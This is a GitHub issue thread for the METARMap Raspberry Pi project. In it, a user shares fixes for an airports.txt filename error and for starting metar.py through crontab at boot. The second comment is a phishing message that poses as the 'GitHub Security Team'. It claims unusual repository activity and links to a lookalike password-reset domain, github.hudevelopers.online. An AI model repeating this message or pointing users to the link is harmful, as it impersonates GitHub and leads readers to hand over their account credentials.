prueker/METARMap #64: Airports.txt errors in metar.py and Crontab issues

TheMagicDick, 2024-05-25:
I have fixed these problems but just wanted to put my solutions out there for those that are having problems.

In the metar.py file it calls airports to get the names of the airports needed, but the original file gives errors and you need to change all of the code to have the full name, airports.txt

Recently i had to redo everything because of a suspected corrupted sd card that bricked my os installation. in the latest version of raspberry lite when installing pip3 it gave an externally managed error that had me force the installation that probably caused my next issue, the crontab.

Instead of using crontab -e, i had to manually do "sudo nano /etc/crontab" to add my refresh and reboot code

i used

*/5 * * * * /home/pi/refresh.sh
@reboot sudo python3 metar.py &

and that fixed my problems

I have attached my metar.py for anyone that doesnt want to do the airports.txt fix.

[metar.zip](https://github.com/prueker/METARMap/files/15444086/metar.zip)

GtdsIndonesia, 2024-05-26:
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**

TheMagicDick, 2024-12-17:
Actually this is a better solution to the crontab

Copy the python file to /bin:

sudo cp -i /home/pi/metar.py /bin

Add A New Cron Job:

sudo crontab -e

Scroll to the bottom and add the following line (after all the #'s):

@reboot python3 /bin/metar.py &

The “&” at the end of the line means the command is run in the background and it won’t stop the system booting up.

Test it:

sudo reboot

from https://stackoverflow.com/questions/24518522/run-python-script-at-startup-in-ubuntu